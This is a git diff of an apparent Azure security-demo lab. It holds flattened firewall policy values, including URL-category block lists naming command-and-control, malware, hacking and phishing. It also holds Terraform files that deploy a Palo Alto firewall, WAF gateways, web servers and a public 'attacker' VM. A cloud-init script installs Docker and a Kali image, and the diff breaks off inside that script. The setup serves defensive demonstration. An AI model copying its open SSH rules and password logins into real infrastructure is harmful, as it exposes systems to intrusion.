+ alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + + + yes + yes + yes + block + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + White-List + + + command-and-control + hacking + malware + phishing + Black-List + + + + + + + + medium + + White-List + + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + Custom-No-Decrypt + + + block + yes + yes + yes + no + + White-List + + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + Custom-No-Decrypt + + + + + + + + medium + + Black-List + Custom-No-Decrypt + White-List + + + block + yes + yes + yes + no + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + Custom-No-Decrypt + White-List + + + + + + + + alert + alert + + + alert + alert + + + default + default + + + default + default + + + alert + alert + + + default + default + + + + + + + default + reset-both + + + default + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + default + reset-both + + + reset-both + reset-both + + + + + + + default + reset-both + + + default + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + default + reset-both + + + reset-both + reset-both + + + + + + + default + reset-both + + + default + reset-both + + + reset-both + reset-both + + + reset-both + reset-both + + + default + reset-both + + + reset-both + reset-both + + + + + + + default + default + + + default + default + + + reset-both + reset-both + + + reset-both + reset-both + + + default + default + + + reset-both + reset-both + + + Use this profile for rules needing modifications to the standard + + + + + drop + drop + + + drop + drop + + + drop + drop + + + drop + drop + + + drop + drop + + + drop + drop + + + yes + + + + + + + + + + + any + + + critical + high + medium + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + + + any + + any + any + any + disable + + + + + + + + + + + any + + + critical + high + medium + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + + + any + + any + any + any + disable + + + + + + + + + + + any + + + critical + high + + + any + + any + any + any + single-packet + + + + + + + any + + + low + informational + medium + + + any + + any + any + any + disable + + + + + + + + + + + any + + + any + + + any + + any + any + any + disable + + + + + + + + + + + + any + + + critical + high + medium + low + + + any + + any + any + any + single-packet + + + + + + + Internal + + + informational + + + any + + any + any + any + disable + + + + + + + any + + + informational + + + any + + any + any + any + extended-capture + + + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + any + + + any + + both + public-cloud + + + + + + + + + Outbound-AV + + + Outbound-AS + + + Outbound-VP + + + Outbound-URL + + + Outbound-FB + + + Outbound-WF + + + + + Inbound-AV + + + Inbound-AS + + + Inbound-VP + + + Inbound-FB + + + Inbound-WF + + + + + Internal-AV + + + Internal-AS + + + Internal-VP + + + Internal-FB + + + Internal-WF + + + + + Alert-Only-AV + + + Alert-Only-AS + + + Alert-Only-VP + + + Alert-Only-URL + + + Alert-Only-FB + + + Alert-Only-WF + + + + + + + + + + + + + + diff --git a/azure/Jenkins_proj-working/WebInDeploy/bootstrap/init-cfg.txt b/azure/Jenkins_proj-working/WebInDeploy/bootstrap/init-cfg.txt new file mode 100644 index 00000000..a8b71315 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/bootstrap/init-cfg.txt @@ -0,0 +1,2 @@ +dns-primary=8.8.8.8 +dns-secondary=8.8.4.4 \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/firewall.tf b/azure/Jenkins_proj-working/WebInDeploy/firewall.tf new file mode 100644 index 00000000..f5a09753 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/firewall.tf @@ -0,0 +1,50 @@ +#### CREATE THE FIREWALL #### + +resource "azurerm_virtual_machine" "firewall" { + name = "firewall" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + network_interface_ids = + [ + "${azurerm_network_interface.fwmanagement.id}", + "${azurerm_network_interface.fwuntrust.id}", + "${azurerm_network_interface.fwtrust.id}" + ] + + primary_network_interface_id = "${azurerm_network_interface.fwmanagement.id}" + vm_size = "Standard_D3_v2" + + plan { + name = "bundle2" + publisher = "paloaltonetworks" + product = "vmseries1" + } + + storage_image_reference { + publisher = "paloaltonetworks" + offer = "vmseries1" + sku = "bundle2" + version = "8.1.0" + } + + storage_os_disk { + name = "firewall-disk" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_type = "Standard_LRS" + } + + delete_os_disk_on_termination = true + delete_data_disks_on_termination = true + + os_profile { + computer_name = "pa-vm" + admin_username = "${var.Admin_Username}" + admin_password = "${var.Admin_Password}" + custom_data = "storage-account=${var.Bootstrap_Storage_Account},access-key=${var.Storage_Account_Access_Key},file-share=${var.Storage_Account_Fileshare},share-directory=${var.Storage_Account_Fileshare_Directory}" + } + + os_profile_linux_config { + disable_password_authentication = false + } +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/interfaces.tf b/azure/Jenkins_proj-working/WebInDeploy/interfaces.tf new file mode 100644 index 00000000..7669c85c --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/interfaces.tf @@ -0,0 +1,55 @@ +#### CREATE THE NETWORK INTERFACES #### + +resource "azurerm_network_interface" "fwmanagement" { + name = "fwmanagement" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + ip_configuration { + name = "fweth0" + subnet_id = "${azurerm_subnet.management.id}" + private_ip_address_allocation = "Static" + private_ip_address = "${var.FW_Mgmt_IP}" + public_ip_address_id = "${azurerm_public_ip.fwmanagement.id}" + } + depends_on = ["azurerm_public_ip.fwmanagement"] +} + +resource "azurerm_network_interface" "fwuntrust" { + name = "fwuntrust" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + enable_ip_forwarding = "true" + ip_configuration { + name = "fweth1" + subnet_id = "${azurerm_subnet.untrust.id}" + private_ip_address_allocation = "Static" + private_ip_address = "${var.FW_Untrust_IP}" + } +} + +resource "azurerm_network_interface" "fwtrust" { + name = "fwtrust" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + enable_ip_forwarding = "true" + ip_configuration { + name = "fweth2" + subnet_id = "${azurerm_subnet.trust.id}" + private_ip_address_allocation = "Static" + private_ip_address = "${var.FW_Trust_IP}" + } +} + +#### WEB SERVER INTERFACES FOR APP1 #### + +resource "azurerm_network_interface" "web1" { + name = "web1eth0" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + ip_configuration { + name = "web1eth0" + subnet_id = "${azurerm_subnet.webservers.id}" + private_ip_address_allocation = "Static" + private_ip_address = "${var.Web_IP}" + } +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-interfaces.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-interfaces.tf new file mode 100644 index 00000000..3dc66140 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/kali-interfaces.tf @@ -0,0 +1,15 @@ +#### CREATE THE NETWORK INTERFACES #### + +resource "azurerm_network_interface" "attacker" { + name = "attacker" + location = "${azurerm_resource_group.attackgroup.location}" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" + ip_configuration { + name = "eth0" + subnet_id = "${azurerm_subnet.attacker.id}" + private_ip_address_allocation = "Static" + private_ip_address = "${var.Attack_IP}" + public_ip_address_id = "${azurerm_public_ip.attacker.id}" + } + depends_on = ["azurerm_public_ip.attacker"] +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-nsg.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-nsg.tf new file mode 100644 index 00000000..539e88a6 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/kali-nsg.tf @@ -0,0 +1,45 @@ +resource "azurerm_network_security_group" "Attack_NSG" { + name = "Attack_NSG" + location = "${azurerm_resource_group.attackgroup.location}" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" + + security_rule { + name = "Allow-FW-22" + priority = 100 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "22" + source_address_prefix = "*" + destination_address_prefix = "${var.Attack_IP}" + } + + security_rule { + name = "Allow-FW-443" + priority = 101 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "443" + source_address_prefix = "*" + destination_address_prefix = "${var.Attack_IP}" + } + + security_rule { + name = "Allow-FW-5000" + priority = 102 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "5000" + source_address_prefix = "*" + destination_address_prefix = "${var.Attack_IP}" + } +} +resource "azurerm_subnet_network_security_group_association" "attackgroup" { + subnet_id = "${azurerm_subnet.attacker.id}" + network_security_group_id = "${azurerm_network_security_group.Attack_NSG.id}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-public-ips.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-public-ips.tf new file mode 100644 index 00000000..c56b2d23 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/kali-public-ips.tf @@ -0,0 +1,8 @@ +#### CREATE PUBLIC IP ADDRESSES #### + +resource "azurerm_public_ip" attacker { + name = "attacker" + location = "${azurerm_resource_group.attackgroup.location}" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" + allocation_method = "Static" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-rg-subnets.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-rg-subnets.tf new file mode 100644 index 00000000..6ca1e8a0 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/kali-rg-subnets.tf @@ -0,0 +1,29 @@ +# ********** RESOURCE GROUP ********** + +# Create a resource group +resource "random_id" "attack_resource_group" { + byte_length = 2 +} +resource "azurerm_resource_group" "attackgroup" { + name = "${var.Attack_RG_Name}-${lower(random_id.attack_resource_group.hex)}" + location = "${var.Azure_Region}" +} + +# ********** VNET ********** + +# Create a virtual network in the resource group +resource "azurerm_virtual_network" "attack-vnet" { + name = "attack-vnet" + address_space = ["${var.Attack_CIDR}"] + location = "${azurerm_resource_group.attackgroup.location}" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" +} + +#### CREATE THE SUBNETS #### + +resource "azurerm_subnet" "attacker" { + name = "attacker" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" + virtual_network_name = "${azurerm_virtual_network.attack-vnet.name}" + address_prefix = "${var.Attack_Subnet_CIDR}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-route-tables.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-route-tables.tf new file mode 100644 index 00000000..c393ebf7 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/kali-route-tables.tf @@ -0,0 +1,16 @@ +#### CREATE THE ROUTE TABLES #### + +resource "azurerm_route_table" "attacker" { + name = "attacker" + location = "${azurerm_resource_group.attackgroup.location}" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" + route { + name = "internet" + address_prefix = "0.0.0.0/0" + next_hop_type = "internet" + } +} +resource "azurerm_subnet_route_table_association" "attacker" { + subnet_id = "${azurerm_subnet.attacker.id}" + route_table_id = "${azurerm_route_table.attacker.id}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/kali-server.tf b/azure/Jenkins_proj-working/WebInDeploy/kali-server.tf new file mode 100644 index 00000000..c6c9cef0 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/kali-server.tf @@ -0,0 +1,46 @@ +data "template_file" "attacker" { + + template = "${file("${path.root}${var.Attack_Initscript_Path}")}" +} +data "template_cloudinit_config" "attacker" { + gzip = true + base64_encode = true + + part { + content = "${data.template_file.attacker.rendered}" + } +} + +resource "azurerm_virtual_machine" "attacker" { + name = "attacker" + location = "${azurerm_resource_group.attackgroup.location}" + resource_group_name = "${azurerm_resource_group.attackgroup.name}" + vm_size = "Standard_A3" + + storage_image_reference { + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + version = "latest" + } + + storage_os_disk { + name = "attacker-disk" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_type = "Standard_LRS" + } + + os_profile { + computer_name = "attacker" + admin_username = "${var.Admin_Username}" + admin_password = "${var.Admin_Password}" + custom_data = "${data.template_cloudinit_config.attacker.rendered}" + } + + network_interface_ids = ["${azurerm_network_interface.attacker.id}"] + + os_profile_linux_config { + disable_password_authentication = false + } +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/loadbalancers.tf b/azure/Jenkins_proj-working/WebInDeploy/loadbalancers.tf new file mode 100644 index 00000000..14f0338f --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/loadbalancers.tf @@ -0,0 +1,155 @@ +#### CREATE THE LOAD BALANCERS #### + +#### AppGW1 #### + +resource "azurerm_application_gateway" "appgw1" { + name = "appgw1" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + sku { + name = "WAF_Medium" + tier = "WAF" + capacity = 2 + } + waf_configuration { + enabled = "true" + firewall_mode = "Prevention" + rule_set_type = "OWASP" + rule_set_version = "3.0" + } + gateway_ip_configuration { + name = "loadbalancers" + subnet_id = "${azurerm_subnet.loadbalancers.id}" + } + frontend_port { + name = "http" + port = 80 + } + frontend_ip_configuration { + name = "lbpublicipaddress1" + public_ip_address_id = "${azurerm_public_ip.appgw1.id}" + } + backend_address_pool { + name = "webservers" + ip_addresses = ["${var.Web_IP}"] + } + http_listener { + name = "http" + frontend_ip_configuration_name = "lbpublicipaddress1" + frontend_port_name = "http" + protocol = "Http" + } + backend_http_settings { + name = "http" + cookie_based_affinity = "Disabled" + port = 8080 + protocol = "Http" + request_timeout = 1 + } + request_routing_rule { + name = "http" + rule_type = "Basic" + http_listener_name = "http" + backend_address_pool_name = "webservers" + backend_http_settings_name = "http" + } + depends_on = ["data.azurerm_resource_group.resourcegroup"] +} + +#### AppGW2 #### + +resource "azurerm_application_gateway" "appgw2" { + name = "appgw2" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + sku { + name = "WAF_Medium" + tier = "WAF" + capacity = 2 + } + waf_configuration { + enabled = "true" + firewall_mode = "Prevention" + rule_set_type = "OWASP" + rule_set_version = "3.0" + } + gateway_ip_configuration { + name = "loadbalancers" + subnet_id = "${azurerm_subnet.loadbalancers.id}" + } + frontend_port { + name = "http" + port = 80 + } + frontend_ip_configuration { + name = "lbpublicipaddress2" + public_ip_address_id = "${azurerm_public_ip.appgw2.id}" + } + backend_address_pool { + name = "firewalls" + ip_addresses = ["${var.FW_Untrust_IP}"] + } + http_listener { + name = "http" + frontend_ip_configuration_name = "lbpublicipaddress2" + frontend_port_name = "http" + protocol = "Http" + } + backend_http_settings { + name = "http" + cookie_based_affinity = "Disabled" + port = 80 + protocol = "Http" + request_timeout = 1 + } + request_routing_rule { + name = "http" + rule_type = "Basic" + http_listener_name = "http" + backend_address_pool_name = "firewalls" + backend_http_settings_name = "http" + } + depends_on = ["data.azurerm_resource_group.resourcegroup"] +} + +#### INTERNAL APP FACING LOAD BALANCER #### + +resource "azurerm_lb" "weblb" { + name = "weblb" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + frontend_ip_configuration { + name = "weblbip" + subnet_id = "${azurerm_subnet.webservers.id}" + private_ip_address_allocation = "Static" + private_ip_address = "${var.WebLB_IP}" + } +} +resource "azurerm_lb_backend_address_pool" "webservers" { + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + loadbalancer_id = "${azurerm_lb.weblb.id}" + name = "webservers" +} +resource "azurerm_network_interface_backend_address_pool_association" "webservers" { + network_interface_id = "${azurerm_network_interface.web1.id}" + ip_configuration_name = "web1eth0" + backend_address_pool_id = "${azurerm_lb_backend_address_pool.webservers.id}" +} +resource "azurerm_lb_probe" "webservers" { + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + loadbalancer_id = "${azurerm_lb.weblb.id}" + name = "http-running-probe" + port = 8080 +} + +resource "azurerm_lb_rule" "webservers" { + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + loadbalancer_id = "${azurerm_lb.weblb.id}" + name = "WebRule" + protocol = "Tcp" + frontend_port = 8080 + backend_port = 8080 + frontend_ip_configuration_name = "weblbip" + backend_address_pool_id = "${azurerm_lb_backend_address_pool.webservers.id}" + probe_id = "${azurerm_lb_probe.webservers.id}" +} diff --git a/azure/Jenkins_proj-working/WebInDeploy/nsg.tf b/azure/Jenkins_proj-working/WebInDeploy/nsg.tf new file mode 100644 index 00000000..fd8452a8 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/nsg.tf @@ -0,0 +1,84 @@ +resource "azurerm_network_security_group" "PAN_FW_NSG" { + name = "DefaultNSG" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + location = "${data.azurerm_resource_group.resourcegroup.location}" + + security_rule { + name = "Allow-22" + priority = 100 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "22" + source_address_prefix = "*" + destination_address_prefix = "${var.FW_Mgmt_IP}" + } + security_rule { + name = "Allow-443" + priority = 101 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "443" + source_address_prefix = "*" + destination_address_prefix = "${var.FW_Mgmt_IP}" + } + + security_rule { + name = "Allow-80-LB" + priority = 102 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "80" + source_address_prefix = "*" + destination_address_prefix = "*" + } + + security_rule { + name = "Allow-Intra-80" + priority = 103 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "80" + source_address_prefix = "${var.Victim_CIDR}" + destination_address_prefix = "*" + } + + security_rule { + name = "Allow-Intra-8080" + priority = 104 + direction = "Inbound" + access = "Allow" + protocol = "*" + source_port_range = "*" + destination_port_range = "8080" + source_address_prefix = "${var.Victim_CIDR}" + destination_address_prefix = "*" + } +} +resource "azurerm_subnet_network_security_group_association" "management" { + subnet_id = "${azurerm_subnet.management.id}" + network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}" +} +resource "azurerm_subnet_network_security_group_association" "untrust" { + subnet_id = "${azurerm_subnet.untrust.id}" + network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}" +} +resource "azurerm_subnet_network_security_group_association" "trust" { + subnet_id = "${azurerm_subnet.trust.id}" + network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}" +} +resource "azurerm_subnet_network_security_group_association" "loadbalancers" { + subnet_id = "${azurerm_subnet.loadbalancers.id}" + network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}" +} +resource "azurerm_subnet_network_security_group_association" "webservers" { + subnet_id = "${azurerm_subnet.webservers.id}" + network_security_group_id = "${azurerm_network_security_group.PAN_FW_NSG.id}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/outputs.bak b/azure/Jenkins_proj-working/WebInDeploy/outputs.bak new file mode 100644 index 00000000..3e50e79d --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/outputs.bak @@ -0,0 +1,19 @@ +output "MGT-IP-FW-1" { + value = "${azurerm_public_ip.fwmanagement.ip_address}" +} + +output "NLB-DNS" { + value = "${aws_lb.int-nlb.dns_name}" +} + +output "ALB-DNS" { + value = "${aws_lb.panos-alb.dns_name}" +} + +output "NATIVE-DNS" { + value = "${aws_lb.native-alb.dns_name}" +} + +output "ATTACKER_IP" { + value = "${azurerm_public_ip.attacker.ip_address}" +} diff --git a/azure/Jenkins_proj-working/WebInDeploy/outputs.tf b/azure/Jenkins_proj-working/WebInDeploy/outputs.tf new file mode 100644 index 00000000..81a006ad --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/outputs.tf @@ -0,0 +1,27 @@ +output "MGT-IP-FW-1" { + value = "${azurerm_public_ip.fwmanagement.ip_address}" +} + +output "NLB-DNS" { + value = "${var.WebLB_IP}" +} + +output "ALB-DNS" { + value = "${azurerm_public_ip.appgw2.fqdn}" +} + +output "NATIVE-DNS" { + value = "${azurerm_public_ip.appgw1.fqdn}" +} + +output "ATTACKER_IP" { + value = "${azurerm_public_ip.attacker.ip_address}" +} + +output "RG_Name" { + value = "${data.azurerm_resource_group.resourcegroup.name}" +} + +output "Attacker_RG_Name" { + value = "${azurerm_resource_group.attackgroup.name}" +} diff --git a/azure/Jenkins_proj-working/WebInDeploy/public-ips.tf b/azure/Jenkins_proj-working/WebInDeploy/public-ips.tf new file mode 100644 index 00000000..2db98644 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/public-ips.tf @@ -0,0 +1,26 @@ +#### CREATE PUBLIC IP ADDRESSES #### +resource "random_id" "public_ip" { + byte_length = 2 +} +resource "azurerm_public_ip" fwmanagement { + name = "fwmanagement" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + allocation_method = "Static" +} + +resource "azurerm_public_ip" "appgw1" { + name = "appgw1" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + domain_name_label = "sans-ngfw-${lower(random_id.public_ip.hex)}" + allocation_method = "Dynamic" +} + +resource "azurerm_public_ip" "appgw2" { + name = "appgw2" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + domain_name_label = "with-ngfw-${lower(random_id.public_ip.hex)}" + allocation_method = "Dynamic" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/rg-subnets.tf b/azure/Jenkins_proj-working/WebInDeploy/rg-subnets.tf new file mode 100644 index 00000000..efc3be8f --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/rg-subnets.tf @@ -0,0 +1,54 @@ +//# ********** RESOURCE GROUP ********** +// +//# Create a resource group +resource "azurerm_resource_group" "resourcegroup" { + name = "${var.RG_Name}" + location = "${var.Azure_Region}" +} + +//# ********** VNET ********** +// +//# Create a virtual network in the resource group +//resource "azurerm_virtual_network" "vnet" { +// name = "vnet-fw" +// address_space = ["${var.VNetCIDR}"] +// location = "${azurerm_resource_group.resourcegroup.location}" +// resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +//} +// +//#### CREATE THE SUBNETS #### +// +//resource "azurerm_subnet" "management" { +// name = "management" +// resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +// virtual_network_name = "${azurerm_virtual_network.vnet.name}" +// address_prefix = "${var.WebCIDR_MGMT}" +//} +// +//resource "azurerm_subnet" "untrust" { +// name = "untrust" +// resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +// virtual_network_name = "${azurerm_virtual_network.vnet.name}" +// address_prefix = "${var.WebCIDR_UntrustBlock}" +//} +// +//resource "azurerm_subnet" "trust" { +// name = "trust" +// resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +// virtual_network_name = "${azurerm_virtual_network.vnet.name}" +// address_prefix = "${var.WebCIDR_TrustBlock}" +//} +// +//resource "azurerm_subnet" "loadbalancers" { +// name = "loadbalancers" +// resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +// virtual_network_name = "${azurerm_virtual_network.vnet.name}" +// address_prefix = "${var.WebCIDR_AppGWBlock}" +//} +// +//resource "azurerm_subnet" "webservers" { +// name = "webservers" +// resource_group_name = "${azurerm_resource_group.resourcegroup.name}" +// virtual_network_name = "${azurerm_virtual_network.vnet.name}" +// address_prefix = "${var.WebCIDR_WebBlock}" +//} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/route-tables.tf b/azure/Jenkins_proj-working/WebInDeploy/route-tables.tf new file mode 100644 index 00000000..7b286b57 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/route-tables.tf @@ -0,0 +1,48 @@ +#### CREATE THE ROUTE TABLES #### + +resource "azurerm_route_table" "management" { + name = "management" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + route { + name = "internet" + address_prefix = "0.0.0.0/0" + next_hop_type = "internet" + } +} +resource "azurerm_route_table" "untrust" { + name = "untrust" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + route { + name = "internet" + address_prefix = "0.0.0.0/0" + next_hop_type = "internet" + } +} + +resource "azurerm_route_table" "webservers" { + name = "webservers" + location = "${data.azurerm_resource_group.resourcegroup.location}" + resource_group_name = "${data.azurerm_resource_group.resourcegroup.name}" + route { + name = "internet" + address_prefix = "0.0.0.0/0" + next_hop_type = "internet" + } +} + +resource "azurerm_subnet_route_table_association" "management" { + subnet_id = "${azurerm_subnet.management.id}" + route_table_id = "${azurerm_route_table.management.id}" +} + +resource "azurerm_subnet_route_table_association" "untrust" { + subnet_id = "${azurerm_subnet.untrust.id}" + route_table_id = "${azurerm_route_table.untrust.id}" +} + +resource "azurerm_subnet_route_table_association" "webservers" { + subnet_id = "${azurerm_subnet.webservers.id}" + route_table_id = "${azurerm_route_table.webservers.id}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker.sh b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker.sh new file mode 100644 index 00000000..032feb65 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/scripts/initialize_attacker.sh @@ -0,0 +1,14 @@ +#!/bin/bash +apt-get update +apt-get update +apt install docker.io python3-pip build-essential libssl-dev libffi-dev -y --force-yes +pip3 install docker-compose +cd /var/tmp +echo "version: '3'" > docker-compose.yml +echo "services:" >> docker-compose.yml +echo " attacker:" >> docker-compose.yml +echo " image: pglynn/kali:latest" 